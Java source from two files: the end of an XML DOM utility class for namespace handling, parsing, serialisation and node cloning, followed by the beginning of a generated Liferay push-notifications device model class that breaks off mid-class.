public static QName getQualifiedAttributeValue(Element el, String attrName)
throws IllegalArgumentException {
String attrValue = DOMUtils.getAttribute(el, attrName);
if (attrValue != null) {
int index = attrValue.indexOf(':');
String attrValuePrefix = (index != -1) ? attrValue.substring(0, index)
: null;
String attrValueLocalPart = attrValue.substring(index + 1);
String attrValueNamespaceURI = DOMUtils.getNamespaceURIFromPrefix(el,
attrValuePrefix);
if (attrValueNamespaceURI != null) {
return new QName(attrValueNamespaceURI, attrValueLocalPart);
}
throw new IllegalArgumentException("Unable to determine "
+ "namespace of '"
+ ((attrValuePrefix != null) ? (attrValuePrefix + ":") : "")
+ attrValueLocalPart + "'.");
}
return null;
}
/**
* Count number of children of a certain type of the given element.
*
* @param elem the element whose kids are to be counted
* @param nodeType DOCUMENTME
*
* @return the number of matching kids.
*/
public static int countKids(Element elem, short nodeType) {
int nkids = 0;
for (Node n = elem.getFirstChild(); n != null; n = n.getNextSibling()) {
if (n.getNodeType() == nodeType) {
nkids++;
}
}
return nkids;
}
/**
* This method traverses the DOM and grabs namespace declarations
* on parent elements with the intent of preserving them for children. <em>Note
* that the DOM level 3 document method {@link Element#getAttribute(java.lang.String)}
* is not desirable in this case, as it does not respect namespace prefix
* bindings that may affect attribute values. (Namespaces in DOM are
* uncategorically a mess, especially in the context of XML Schema.)</em>
* @param el the starting element
* @return a {@link Map} containing prefix bindings.
*/
public static Map<String, String> getParentNamespaces(Element el) {
HashMap<String,String> pref = new HashMap<String,String>();
Map<String,String> mine = getMyNamespaces(el);
Node n = el.getParentNode();
while (n != null && n.getNodeType() != Node.DOCUMENT_NODE) {
if (n instanceof Element) {
Element l = (Element) n;
NamedNodeMap nnm = l.getAttributes();
int len = nnm.getLength();
for (int i = 0; i < len; ++i) {
Attr a = (Attr) nnm.item(i);
if (isNSAttribute(a)) {
String key = getNSPrefixFromNSAttr(a);
String uri = a.getValue();
// prefer prefix bindings that are lower down in the tree.
if (pref.containsKey(key) || mine.containsKey(key)) continue;
pref.put(key, uri);
}
}
}
n = n.getParentNode();
}
return pref;
}
/**
* Construct a {@link NSContext} instance for the supplied element.
* @param el the <code>Element</code> to gather the namespace context for
* @return the <code>NSContext</code>
*/
public static NSContext getMyNSContext(Element el) {
NSContext ns = new NSContext();
ns.register(getParentNamespaces(el));
ns.register(getMyNamespaces(el));
return ns;
}
public static Map<String,String> getMyNamespaces(Element el) {
HashMap<String,String> mine = new HashMap<String,String>();
NamedNodeMap nnm = el.getAttributes();
int len = nnm.getLength();
for (int i=0; i < len; ++i) {
Attr a = (Attr) nnm.item(i);
if (isNSAttribute(a)) {
mine.put(getNSPrefixFromNSAttr(a),a.getValue());
}
}
return mine;
}
/**
* Test whether an attribute contains a namespace declaration.
* @param a an {@link Attr} to test.
* @return <code>true</code> if the {@link Attr} is a namespace declaration
*/
public static boolean isNSAttribute(Attr a) {
assert a != null;
String s = a.getNamespaceURI();
return (s != null && s.equals(NS_URI_XMLNS));
}
/**
* Fetch the non-null namespace prefix from a {@link Attr} that declares
* a namespace. (The DOM APIs will return <code>null</code> for a non-prefixed
* declaration.
* @param a the {@link Attr} with the declaration (must be non-<code>null</code).
* @return the namespace prefix or <code>""</code> if none was
* declared, e.g., <code>xmlns="foo"</code>.
*/
public static String getNSPrefixFromNSAttr(Attr a) {
assert a != null;
assert isNSAttribute(a);
if (a.getPrefix() == null) {
return "";
}
return a.getName().substring(a.getPrefix().length()+1);
}
/**
* Convert a DOM node to a stringified XML representation.
*/
static public String domToString(Node node) {
if (node == null) {
throw new IllegalArgumentException("Cannot stringify null Node!");
}
String value = null;
short nodeType = node.getNodeType();
if (nodeType == Node.ELEMENT_NODE || nodeType == Node.DOCUMENT_NODE || nodeType == Node.DOCUMENT_FRAGMENT_NODE) {
// serializer doesn't handle Node type well, only Element
DOMSerializerImpl ser = new DOMSerializerImpl();
ser.setParameter(Constants.DOM_NAMESPACES, Boolean.TRUE);
ser.setParameter(Constants.DOM_WELLFORMED, Boolean.FALSE );
ser.setParameter(Constants.DOM_VALIDATE, Boolean.FALSE);
// create a proper XML encoding header based on the input document;
// default to UTF-8 if the parent document's encoding is not accessible
String usedEncoding = "UTF-8";
Document parent = node.getOwnerDocument();
if (parent != null) {
String parentEncoding = parent.getXmlEncoding();
if (parentEncoding != null) {
usedEncoding = parentEncoding;
}
}
// the receiver of the DOM
DOMOutputImpl out = new DOMOutputImpl();
out.setEncoding(usedEncoding);
// we write into a String
StringWriter writer = new StringWriter(4096);
out.setCharacterStream(writer);
// out, ye characters!
ser.write(node, out);
writer.flush();
// finally get the String
value = writer.toString();
} else {
value = node.getNodeValue();
}
return value;
}
public static void serialize(Element elmt, OutputStream ostr) {
String usedEncoding = "UTF-8";
Document parent = elmt.getOwnerDocument();
if (parent != null) {
String parentEncoding = parent.getXmlEncoding();
if (parentEncoding != null) {
usedEncoding = parentEncoding;
}
}
DOMOutputImpl out = new DOMOutputImpl();
out.setEncoding(usedEncoding);
DOMSerializerImpl ser = new DOMSerializerImpl();
out.setByteStream(ostr);
ser.write(elmt, out);
}
/**
* Convert a DOM node to a stringified XML representation.
*/
static public String domToStringLevel2(Node node) {
if (node == null) {
throw new IllegalArgumentException("Cannot stringify null Node!");
}
String value = null;
short nodeType = node.getNodeType();
if (nodeType == Node.ELEMENT_NODE || nodeType == Node.DOCUMENT_NODE) {
// serializer doesn't handle Node type well, only Element
DOMSerializerImpl ser = new DOMSerializerImpl();
ser.setParameter(Constants.DOM_NAMESPACES, Boolean.TRUE);
ser.setParameter(Constants.DOM_WELLFORMED, Boolean.FALSE );
ser.setParameter(Constants.DOM_VALIDATE, Boolean.FALSE);
// the receiver of the DOM
DOMOutputImpl out = new DOMOutputImpl();
out.setEncoding("UTF-8");
// we write into a String
StringWriter writer = new StringWriter(4096);
out.setCharacterStream(writer);
// out, ye characters!
ser.write(node, out);
writer.flush();
// finally get the String
value = writer.toString();
} else {
value = node.getNodeValue();
}
return value;
}
/**
* Return the first child element of the given element which has the given
* attribute with the given value.
*
* @param elem the element whose children are to be searched
* @param attrName the attrib that must be present
* @param attrValue the desired value of the attribute
*
* @return the first matching child element.
*/
public static Element findChildElementWithAttribute(Element elem,
String attrName, String attrValue) {
for (Node n = elem.getFirstChild(); n != null; n = n.getNextSibling()) {
if (n.getNodeType() == Node.ELEMENT_NODE) {
if (attrValue.equals(DOMUtils.getAttribute((Element) n, attrName))) { return (Element) n; }
}
}
return null;
}
/**
* Parse a String into a DOM.
*
* @param s DOCUMENTME
*
* @return DOCUMENTME
*
* @throws SAXException DOCUMENTME
* @throws IOException DOCUMENTME
*/
static public Element stringToDOM(String s) throws SAXException, IOException {
return parse(new InputSource(new StringReader(s))).getDocumentElement();
}
/**
* Perform a naive check to see if a document is a WSDL document
* based on the root element name and namespace URI.
* @param d the {@link Document} to check
* @return <code>true</code> if the root element appears correct
*/
public static boolean isWsdlDocument(Document d) {
Element e = d.getDocumentElement();
String uri = e.getNamespaceURI();
String localName = e.getLocalName();
if (uri == null || localName == null) { return false; }
return uri.equals(WSDL_NS) && localName.equals(WSDL_ROOT_ELEMENT);
}
/**
* Perform a naive check to see if a document is an XML schema document
* based on the root element name and namespace URI.
* @param d the {@link Document} to check
* @return <code>true</code> if the root element appears correct
*/
public static boolean isXmlSchemaDocument(Document d) {
Element e = d.getDocumentElement();
String uri = e.getNamespaceURI();
String localName = e.getLocalName();
if (uri == null || localName == null) { return false; }
return uri.equals(XSD_NS) && localName.equals(XSD_ROOT_ELEMENT);
}
public static final String WSDL_NS = "http://schemas.xmlsoap.org/wsdl/";
public static final String WSDL_ROOT_ELEMENT = "definitions";
public static final String XSD_NS = "http://www.w3.org/2001/XMLSchema";
public static final String XSD_ROOT_ELEMENT = "schema";
/**
* @param el
*/
public static void pancakeNamespaces(Element el) {
Map ns = getParentNamespaces(el);
Document d = el.getOwnerDocument();
assert d != null;
Iterator it = ns.keySet().iterator();
while (it.hasNext()) {
String key = (String) it.next();
String uri = (String) ns.get(key);
Attr a = d.createAttributeNS(NS_URI_XMLNS,
(key.length() != 0)?("xmlns:" + key):("xmlns"));
a.setValue(uri);
el.setAttributeNodeNS(a);
}
}
public static Document newDocument() {
DocumentBuilder db = getBuilder();
return db.newDocument();
}
/**
* Parse an XML stream using the pooled document builder.
* @param inputStream input stream
* @return parsed XML document
*/
public static Document parse(InputStream inputStream) throws SAXException, IOException {
return parse(new InputSource(inputStream));
}
/**
* Parse an XML document located using an {@link InputSource} using the
* pooled document builder.
*/
public static Document parse(InputSource inputSource) throws SAXException,IOException{
DocumentBuilder db = getBuilder();
return db.parse(inputSource);
}
/**
* Parse an XML document located using an {@link InputSource} using the
* pooled document builder.
*/
public static Document sourceToDOM(Source inputSource) throws IOException {
try {
/*
// Requires JDK 1.6+
if (inputSource instanceof StAXSource) {
StAXSource stax = (StAXSource) inputSource;
//if (stax.getXMLEventReader() != null || sax.getXMLStreamReader() != null) {
if (sax.getXMLStreamReader() != null) {
return parse(stax.getXMLStreamReader());
}
}
*/
if (inputSource instanceof SAXSource) {
InputSource sax = ((SAXSource) inputSource).getInputSource();
if (sax.getCharacterStream() != null || sax.getByteStream() != null) {
return parse( ((SAXSource) inputSource).getInputSource() );
}
}
if (inputSource instanceof DOMSource) {
Node node = ((DOMSource) inputSource).getNode();
if (node != null) {
return toDOMDocument(node);
}
}
if (inputSource instanceof StreamSource) {
StreamSource stream = (StreamSource) inputSource;
if (stream.getReader() != null || stream.getInputStream() != null) {
return toDocumentFromStream( (StreamSource) inputSource);
}
}
DOMResult domresult = new DOMResult(newDocument());
Transformer txer = getTransformer();
txer.transform(inputSource, domresult);
return (Document) domresult.getNode();
} catch (SAXException e) {
throwIOException(e);
} catch (TransformerException e) {
throwIOException(e);
}
throw new IllegalArgumentException("Cannot parse XML source: " + inputSource.getClass());
}
/**
* Check that an element is empty, i.e., it contains no non-whitespace text or
* elements as children.
* @param el the element
* @return <code>true</code> if the element is empty, <code>false</code> if not.
*/
public static boolean isEmptyElement(Element el) {
NodeList nl = el.getChildNodes();
int len = nl.getLength();
for (int i=0; i < len; ++i) {
switch (nl.item(i).getNodeType()) {
case Node.CDATA_SECTION_NODE:
case Node.TEXT_NODE:
String s = nl.item(i).getNodeValue();
if (s != null && s.trim().length() > 0) {
return false;
}
break;
case Node.ELEMENT_NODE:
return false;
}
}
return true;
}
public static QName getNodeQName(Node el) {
String localName = el.getLocalName();
String namespaceUri = el.getNamespaceURI();
if (localName == null) {
String nodeName = el.getNodeName();
int colonIndex = nodeName.indexOf(":");
if (colonIndex > 0) {
localName = nodeName.substring(0, colonIndex);
namespaceUri = nodeName.substring(colonIndex + 1);
} else {
localName = nodeName;
namespaceUri = null;
}
}
return new QName(namespaceUri, localName);
}
public static QName getNodeQName(String qualifiedName) {
int index = qualifiedName.indexOf(":");
if (index >= 0) {
return new QName(qualifiedName.substring(0, index), qualifiedName.substring(index + 1));
} else {
return new QName(qualifiedName);
}
}
/**
* Remove the child nodes under another node.
* @param target the <code>Node</code> to remove the children from.
*/
public static void removeChildren(Node target) {
while (target.hasChildNodes()) {
target.removeChild(target.getFirstChild());
}
}
/**
* Drop the attributes from an element, except possibly an <code>xmlns</code>
* attribute that declares its namespace.
* @param target the element whose attributes will be removed.
* @param flag preserve namespace declaration
*/
public static void removeAttributes(Element target, boolean flag) {
if (!target.hasAttributes()) {
return;
}
String prefix = target.getPrefix();
NamedNodeMap nnm = target.getAttributes();
Attr toPutBack = null;
if (flag) {
if (prefix== null) {
toPutBack = target.getAttributeNodeNS(NS_URI_XMLNS,"xmlns");
} else {
toPutBack = target.getAttributeNodeNS(NS_URI_XMLNS,"xmlns:" + prefix);
}
}
while(nnm.getLength() != 0) {
target.removeAttributeNode((Attr) nnm.item(0));
}
if (toPutBack != null) {
target.setAttributeNodeNS(toPutBack);
}
}
public static Element findChildByName(Element parent, QName name) {
return findChildByName(parent, name, false);
}
public static Element findChildByName(Element parent, QName name, boolean recurse) {
if (parent == null)
throw new IllegalArgumentException("null parent");
if (name == null)
throw new IllegalArgumentException("null name");
NodeList nl = parent.getChildNodes();
for (int i = 0; i < nl.getLength(); ++i) {
Node c = nl.item(i);
if(c.getNodeType() != Node.ELEMENT_NODE)
continue;
// For a reason that I can't fathom, when using in-mem DAO we actually get elements with
// no localname.
String nodeName = c.getLocalName() != null ? c.getLocalName() : c.getNodeName();
if (new QName(c.getNamespaceURI(),nodeName).equals(name))
return (Element) c;
}
if(recurse){
NodeList cnl = parent.getChildNodes();
for (int i = 0; i < cnl.getLength(); ++i) {
Node c = cnl.item(i);
if(c.getNodeType() != Node.ELEMENT_NODE)
continue;
Element result = findChildByName((Element)c, name, recurse);
if(result != null)
return result;
}
}
return null;
}
public static Node findChildByType(Element elem, int type) {
if (elem == null)
throw new NullPointerException("elem parameter must not be null!");
for (Node n = elem.getFirstChild(); n != null; n = n.getNextSibling()) {
if (n.getNodeType() == type) {
return n;
}
}
return null;
}
public static String getTextContent(Node node) {
for (int m = 0; m < node.getChildNodes().getLength(); m++) {
Node child = node.getChildNodes().item(m);
if (child.getNodeType() == Node.TEXT_NODE) {
String childText = child.getNodeValue().trim();
if (childText.length() > 0) return childText;
}
}
return null;
}
public static Element getElementContent(Node node) {
for (int m = 0; m < node.getChildNodes().getLength(); m++) {
Node child = node.getChildNodes().item(m);
if (child.getNodeType() == Node.ELEMENT_NODE) return (Element) child;
}
return null;
}
public static void injectNamespaces(Element domElement, NSContext nscontext) {
for (String uri : nscontext.getUriSet()) {
String prefix = nscontext.getPrefix(uri);
if (prefix == null || "".equals(prefix))
domElement.setAttributeNS(DOMUtils.NS_URI_XMLNS, "xmlns", uri);
else
domElement.setAttributeNS(DOMUtils.NS_URI_XMLNS, "xmlns:"+ prefix, uri);
}
}
/**
* Adds namespaces including all prefixes.
* This is needed for correct handling of xsi:type attributes.
* @param domElement An element wi which the namespace attributes should be added.
* @param nscontext A namespace context.
* @author k.petrauskas
*/
public static void injectNamespacesWithAllPrefixes(Element domElement, NSContext nscontext) {
if (__log.isDebugEnabled())
__log.debug("injectNamespacesWithAllPrefixes: element=" + domToString(domElement) + " nscontext=" + nscontext);
for (Map.Entry<String, String> entry : nscontext.toMap().entrySet()) {
String prefix = entry.getKey();
String uri = entry.getValue();
if (prefix == null || "".equals(prefix))
domElement.setAttributeNS(DOMUtils.NS_URI_XMLNS, "xmlns", uri);
else
domElement.setAttributeNS(DOMUtils.NS_URI_XMLNS, "xmlns:"+ prefix, uri);
if (__log.isDebugEnabled())
__log.debug("injectNamespacesWithAllPrefixes: added namespace: prefix=\"" + prefix + "\" uri=\"" + uri + "\"");
}
if (__log.isDebugEnabled())
__log.debug("injectNamespacesWithAllPrefixes: result: element=" + domToString(domElement));
}
public static void copyNSContext(Element source, Element dest) {
Map<String, String> sourceNS = getParentNamespaces(source);
sourceNS.putAll(getMyNamespaces(source));
Map<String, String> destNS = getParentNamespaces(dest);
destNS.putAll(getMyNamespaces(dest));
// (source - dest) to avoid adding twice the same ns on dest
for (String pr : destNS.keySet()) sourceNS.remove(pr);
for (Map.Entry<String, String> entry : sourceNS.entrySet()) {
String prefix = entry.getKey();
String uri = entry.getValue();
if (prefix == null || "".equals(prefix))
dest.setAttributeNS(DOMUtils.NS_URI_XMLNS, "xmlns", uri);
else
dest.setAttributeNS(DOMUtils.NS_URI_XMLNS, "xmlns:"+ prefix, uri);
}
}
public static Document toDOMDocument(Node node) throws TransformerException {
// If the node is the document, just cast it
if (node instanceof Document) {
return (Document) node;
// If the node is an element
} else if (node instanceof Element) {
Element elem = (Element) node;
// If this is the root element, return its owner document
if (elem.getOwnerDocument().getDocumentElement() == elem) {
return elem.getOwnerDocument();
// else, create a new doc and copy the element inside it
} else {
Document doc = newDocument();
doc.appendChild(doc.importNode(node, true));
return doc;
}
// other element types are not handled
} else {
throw new TransformerException("Unable to convert DOM node to a Document");
}
}
public static Document toDocumentFromStream(StreamSource source) throws IOException, SAXException {
DocumentBuilder builder = getBuilder();
Document document = null;
Reader reader = source.getReader();
if (reader != null) {
document = builder.parse(new InputSource(reader));
} else {
InputStream inputStream = source.getInputStream();
if (inputStream != null) {
InputSource inputsource = new InputSource(inputStream);
inputsource.setSystemId( source.getSystemId() );
document = builder.parse(inputsource);
}
else {
throw new IOException("No input stream or reader available");
}
}
return document;
}
// sadly, as of JDK 5.0 IOException still doesn't support new IOException(Throwable)
private static void throwIOException(Throwable t) throws IOException {
IOException e = new IOException(t.getMessage());
e.setStackTrace(t.getStackTrace());
throw e;
}
public static Document parse(XMLStreamReader reader)
throws XMLStreamException
{
Document doc = newDocument();
parse(reader, doc, doc);
return doc;
}
private static void parse(XMLStreamReader reader, Document doc, Node parent)
throws XMLStreamException
{
int event = reader.getEventType();
while (reader.hasNext()) {
switch (event) {
case XMLStreamConstants.START_ELEMENT:
// create element
Element e = doc.createElementNS(reader.getNamespaceURI(), reader.getLocalName());
if (reader.getPrefix() != null && reader.getPrefix() != "") {
e.setPrefix(reader.getPrefix());
}
parent.appendChild(e);
// copy namespaces
for (int ns = 0; ns < reader.getNamespaceCount(); ns++) {
String uri = reader.getNamespaceURI(ns);
String prefix = reader.getNamespacePrefix(ns);
declare(e, uri, prefix);
}
// copy attributes
for (int att = 0; att < reader.getAttributeCount(); att++) {
String name = reader.getAttributeLocalName(att);
String prefix = reader.getAttributePrefix(att);
if (prefix != null && prefix.length() > 0) {
name = prefix + ":" + name;
}
Attr attr = doc.createAttributeNS(reader.getAttributeNamespace(att), name);
attr.setValue(reader.getAttributeValue(att));
e.setAttributeNode(attr);
}
// sub-nodes
if (reader.hasNext()) {
reader.next();
parse(reader, doc, e);
}
if (parent instanceof Document) {
while (reader.hasNext()) reader.next();
return;
}
break;
case XMLStreamConstants.END_ELEMENT:
return;
case XMLStreamConstants.CHARACTERS:
if (parent != null) {
parent.appendChild(doc.createTextNode(reader.getText()));
}
break;
case XMLStreamConstants.COMMENT:
if (parent != null) {
parent.appendChild(doc.createComment(reader.getText()));
}
break;
case XMLStreamConstants.CDATA:
parent.appendChild(doc.createCDATASection(reader.getText()));
break;
case XMLStreamConstants.PROCESSING_INSTRUCTION:
parent.appendChild(doc.createProcessingInstruction(reader.getPITarget(), reader.getPIData()));
break;
case XMLStreamConstants.ENTITY_REFERENCE:
parent.appendChild(doc.createProcessingInstruction(reader.getPITarget(), reader.getPIData()));
break;
case XMLStreamConstants.NAMESPACE:
case XMLStreamConstants.ATTRIBUTE:
break;
default:
break;
}
if (reader.hasNext()) {
event = reader.next();
}
}
}
private static void declare(Element node, String uri, String prefix) {
if (prefix != null && prefix.length() > 0) {
node.setAttributeNS(NS_URI_XMLNS, "xmlns:" + prefix, uri);
} else {
if (uri != null) {
node.setAttributeNS(NS_URI_XMLNS, "xmlns", uri);
}
}
}
private static Transformer getTransformer() {
Transformer txer = __txers.get();
if (txer == null) {
synchronized(_transformerFactory) {
try {
txer = _transformerFactory.newTransformer();
} catch (TransformerConfigurationException e) {
String errmsg = "Transformer configuration error!";
__log.error(errmsg, e);
throw new Error(errmsg, e);
}
}
__txers.set(txer);
}
return txer;
}
private static DocumentBuilder getBuilder() {
DocumentBuilder builder = __builders.get();
if (builder == null) {
synchronized (__documentBuilderFactory) {
try {
builder = __documentBuilderFactory.newDocumentBuilder();
builder.setErrorHandler(new LoggingErrorHandler());
} catch (ParserConfigurationException e) {
__log.error("",e);
throw new RuntimeException(e);
}
}
__builders.set(builder);
}
return builder;
}
public static List<Element> findChildrenByName(Element parent, QName name) {
if (parent == null)
throw new IllegalArgumentException("null parent");
if (name == null)
throw new IllegalArgumentException("null name");
LinkedList<Element> ret = new LinkedList<Element>();
NodeList nl = parent.getChildNodes();
for (int i = 0; i < nl.getLength(); ++i) {
Node c = nl.item(i);
if(c.getNodeType() != Node.ELEMENT_NODE)
continue;
// For a reason that I can't fathom, when using in-mem DAO we actually get elements with
// no localname.
String nodeName = c.getLocalName() != null ? c.getLocalName() : c.getNodeName();
if (new QName(c.getNamespaceURI(),nodeName).equals(name))
ret.add((Element)c);
}
return ret;
}
/**
* Somewhat eases the pain of dealing with both Lists and Nodelists by converting either
* passed as parameter to a List.
* @param nl a NodeList or a List
* @return a List
*/
public static List<Node> toList(Object nl) {
if (nl == null) return null;
if (nl instanceof List) return (List<Node>) nl;
NodeList cnl = (NodeList) nl;
List<Node> ll = new ArrayList<Node>();
for (int m = 0; m < cnl.getLength(); m++) ll.add(cnl.item(m));
return ll;
}
public static Document getDocument(Node contextNode) {
return (contextNode == null) ? DOMUtils.newDocument() : contextNode.getOwnerDocument();
}
public static String getQualifiedName(QName qName) {
String prefix = qName.getPrefix(), localPart = qName.getLocalPart();
return (prefix == null || "".equals(prefix)) ? localPart : (prefix + ":" + localPart);
}
/**
* Deep clone, but don't fry, the given node in the context of the given document.
* For all intents and purposes, the clone is the exact same copy of the node,
* except that it might have a different owner document.
*
* This method is fool-proof, unlike the <code>adoptNode</code> or <code>adoptNode</code> methods,
* in that it doesn't assume that the given node has a parent or a owner document.
*
* @param document
* @param sourceNode
* @return a clone of node
*/
public static Node cloneNode(Document document, Node sourceNode) {
Node clonedNode = null;
// what is my name?
QName sourceQName = getNodeQName(sourceNode);
String nodeName = sourceQName.getLocalPart();
String namespaceURI = sourceQName.getNamespaceURI();
// if the node is unqualified, don't assume that it inherits the WS-BPEL target namespace
if (Namespaces.WSBPEL2_0_FINAL_EXEC.equals(namespaceURI)) {
namespaceURI = null;
}
switch (sourceNode.getNodeType()) {
case Node.ATTRIBUTE_NODE:
if (namespaceURI == null) {
clonedNode = document.createAttribute(nodeName);
} else {
String prefix = ((Attr) sourceNode).lookupPrefix(namespaceURI);
// the prefix for the XML namespace can't be looked up, hence this...
if (prefix == null && namespaceURI.equals(NS_URI_XMLNS)) {
prefix = "xmlns";
}
// if a prefix exists, qualify the name with it
if (prefix != null && !"".equals(prefix)) {
nodeName = prefix + ":" + nodeName;
}
// create the appropriate type of attribute
if (prefix != null) {
clonedNode = document.createAttributeNS(namespaceURI, nodeName);
} else {
clonedNode = document.createAttribute(nodeName);
}
}
break;
case Node.CDATA_SECTION_NODE:
clonedNode = document.createCDATASection(((CDATASection) sourceNode).getData());
break;
case Node.COMMENT_NODE:
clonedNode = document.createComment(((Comment) sourceNode).getData());
break;
case Node.DOCUMENT_FRAGMENT_NODE:
clonedNode = document.createDocumentFragment();
break;
case Node.DOCUMENT_NODE:
clonedNode = document;
break;
case Node.ELEMENT_NODE:
// create the appropriate type of element
if (namespaceURI == null) {
clonedNode = document.createElement(nodeName);
} else {
String prefix = namespaceURI.equals(Namespaces.XMLNS_URI) ?
"xmlns" : ((Element) sourceNode).lookupPrefix(namespaceURI);
if (prefix != null && !"".equals(prefix)) {
nodeName = prefix + ":" + nodeName;
clonedNode = document.createElementNS(namespaceURI, nodeName);
} else {
clonedNode = document.createElement(nodeName);
}
}
// attributes are not treated as child nodes, so copy them explicitly
NamedNodeMap attributes = ((Element) sourceNode).getAttributes();
for (int i = 0; i < attributes.getLength(); i++) {
Attr attributeClone = (Attr) cloneNode(document, attributes.item(i));
if (attributeClone.getNamespaceURI() == null) {
((Element) clonedNode).setAttributeNode(attributeClone);
} else {
((Element) clonedNode).setAttributeNodeNS(attributeClone);
}
}
break;
case Node.ENTITY_NODE:
// TODO
break;
case Node.ENTITY_REFERENCE_NODE:
clonedNode = document.createEntityReference(nodeName);
// TODO
break;
case Node.NOTATION_NODE:
// TODO
break;
case Node.PROCESSING_INSTRUCTION_NODE:
clonedNode = document.createProcessingInstruction(((ProcessingInstruction) sourceNode).getData(), nodeName);
break;
case Node.TEXT_NODE:
clonedNode = document.createTextNode(((Text) sourceNode ).getData());
break;
default:
break;
}
// clone children of element and attribute nodes
NodeList sourceChildren = sourceNode.getChildNodes();
if (sourceChildren != null) {
for (int i = 0; i < sourceChildren.getLength(); i++) {
Node sourceChild = sourceChildren.item(i);
Node clonedChild = cloneNode(document, sourceChild);
clonedNode.appendChild(clonedChild);
// if the child has a textual value, parse it for any embedded prefixes
if (clonedChild.getNodeType() == Node.TEXT_NODE ||
clonedChild.getNodeType() == Node.CDATA_SECTION_NODE) {
parseEmbeddedPrefixes(sourceNode, clonedNode, clonedChild);
}
}
}
return clonedNode;
}
/**
* Parse the text in the cloneChild for any embedded prefixes, and define it in it's parent element
*
* @param sourceNode
* @param clonedNode
* @param clonedChild
*/
private static void parseEmbeddedPrefixes(Node sourceNode, Node clonedNode, Node clonedChild) {
Element clonedElement = null;
if (clonedNode instanceof Attr) {
clonedElement = ((Attr) clonedNode).getOwnerElement();
} else if (clonedNode instanceof Element) {
clonedElement = (Element) clonedNode;
}
if (clonedElement == null) {
// couldn't find an element to set prefixes on, so bail out
return;
}
String text = ((Text) clonedChild).getNodeValue();
if (text != null && text.indexOf(":") > 0) {
Name11Checker nameChecker = Name11Checker.getInstance();
for (int colonIndex = text.indexOf(":"); colonIndex != -1 && colonIndex < text.length(); colonIndex = text.indexOf(":", colonIndex + 1)) {
StringBuffer prefixString = new StringBuffer();
for (int prefixIndex = colonIndex - 1;
prefixIndex >= 0 && nameChecker.isNCNameChar(text.charAt(prefixIndex));
prefixIndex--) {
prefixString.append(text.charAt(prefixIndex));
}
prefixString.reverse();
if (prefixString.length() > 0) {
String uri = sourceNode.lookupNamespaceURI(prefixString.toString());
if (uri != null) {
clonedElement.setAttributeNS(NS_URI_XMLNS, "xmlns:" + prefixString, uri);
}
}
}
}
}
public static Element stringToDOM(byte[] bytes) throws SAXException, IOException {
return stringToDOM(new String(bytes));
}
public static byte[] domToBytes(Element element) {
String stringifiedElement = domToString(element);
return (stringifiedElement != null) ? stringifiedElement.getBytes() : null;
}
}
|
|
package com.liferay.pushnotifications.model;
import com.liferay.portal.kernel.bean.AutoEscapeBeanHandler;
import com.liferay.portal.kernel.exception.SystemException;
import com.liferay.portal.kernel.util.ProxyUtil;
import com.liferay.portal.kernel.util.StringBundler;
import com.liferay.portal.model.BaseModel;
import com.liferay.portal.model.impl.BaseModelImpl;
import com.liferay.portal.util.PortalUtil;
import com.liferay.pushnotifications.service.ClpSerializer;
import com.liferay.pushnotifications.service.PushNotificationsDeviceLocalServiceUtil;
import java.io.Serializable;
import java.lang.reflect.Method;
import java.util.Date;
import java.util.HashMap;
import java.util.Map;
public class PushNotificationsDeviceClp extends BaseModelImpl<PushNotificationsDevice>
implements PushNotificationsDevice {
private long _pushNotificationsDeviceId;
private long _userId;
private String _userUuid;
private Date _createDate;
private String _platform;
private String _token;
private String _model;
private String _OSVersion;
private long _appId;
private String _appVersion;
private BaseModel<?> _pushNotificationsDeviceRemoteModel;
private Class<?> _clpSerializerClass = com.liferay.pushnotifications.service.ClpSerializer.class;
public PushNotificationsDeviceClp() {
}
@Override
public Class<?> getModelClass() {
return PushNotificationsDevice.class;
}
@Override
public String getModelClassName() {
return PushNotificationsDevice.class.getName();
}
@Override
public long getPrimaryKey() {
return _pushNotificationsDeviceId;
}
@Override
public void setPrimaryKey(long primaryKey) {
setPushNotificationsDeviceId(primaryKey);
}
@Override
public Serializable getPrimaryKeyObj() {
return _pushNotificationsDeviceId;
}
@Override
public void setPrimaryKeyObj(Serializable primaryKeyObj) {
setPrimaryKey(((Long) primaryKeyObj).longValue());
}
@Override
public Map<String, Object> getModelAttributes() {
Map<String, Object> attributes = new HashMap<String, Object>();
attributes.put("pushNotificationsDeviceId",
getPushNotificationsDeviceId());
attributes.put("userId", getUserId());
attributes.put("createDate", getCreateDate());
attributes.put("platform", getPlatform());
attributes.put("token", getToken());
attributes.put("model", getModel());
attributes.put("OSVersion", getOSVersion());
attributes.put("appId", getAppId());
attributes.put("appVersion", getAppVersion());
return attributes;
}
@Override
public void setModelAttributes(Map<String, Object> attributes) {
Long pushNotificationsDeviceId = (Long) attributes.get(
"pushNotificationsDeviceId");
if (pushNotificationsDeviceId != null) {
setPushNotificationsDeviceId(pushNotificationsDeviceId);
}
Long userId = (Long) attributes.get("userId");
if (userId != null) {
setUserId(userId);
}
Date createDate = (Date) attributes.get("createDate");
if (createDate != null) {
setCreateDate(createDate);
}
String platform = (String) attributes.get("platform");
if (platform != null) {
setPlatform(platform);
}
String token = (String) attributes.get("token");
if (token != null) {
setToken(token);
}
String model = (String) attributes.get("model");
if (model != null) {
setModel(model);
}
String OSVersion = (String) attributes.get("OSVersion");
if (OSVersion != null) {
setOSVersion(OSVersion);
}
Long appId = (Long) attributes.get("appId");
if (appId != null) {
setAppId(appId);
}
String appVersion = (String) attributes.get("appVersion");
if (appVersion != null) {
setAppVersion(appVersion);
}
}
@Override
public long getPushNotificationsDeviceId() {
return _pushNotificationsDeviceId;
}
@Override
public void setPushNotificationsDeviceId(long pushNotificationsDeviceId) {
_pushNotificationsDeviceId = pushNotificationsDeviceId;
if (_pushNotificationsDeviceRemoteModel != null) {
try {
Class<?> clazz = _pushNotificationsDeviceRemoteModel.getClass();
Method method = clazz.getMethod("setPushNotificationsDeviceId",
long.class);
method.invoke(_pushNotificationsDeviceRemoteModel,
pushNotificationsDeviceId);
} catch (Exception e) {
throw new UnsupportedOperationException(e);
}
}
}
@Override
public long getUserId() {
return _userId;
}
@Override
public void setUserId(long userId) {
_userId = userId;
if (_pushNotificationsDeviceRemoteModel != null) {
try {
Class<?> clazz = _pushNotificationsDeviceRemoteModel.getClass();
Method method = clazz.getMethod("setUserId", long.class);
method.invoke(_pushNotificationsDeviceRemoteModel, userId);
} catch (Exception e) {
throw new UnsupportedOperationException(e);
}
}
}
@Override
public String getUserUuid() throws SystemException {
return PortalUtil.getUserValue(getUserId(), "uuid", _userUuid);
}
@Override
public void setUserUuid(String userUuid) {
_userUuid = userUuid;
}
@Override
public Date getCreateDate() {
return _createDate;
}
@Override
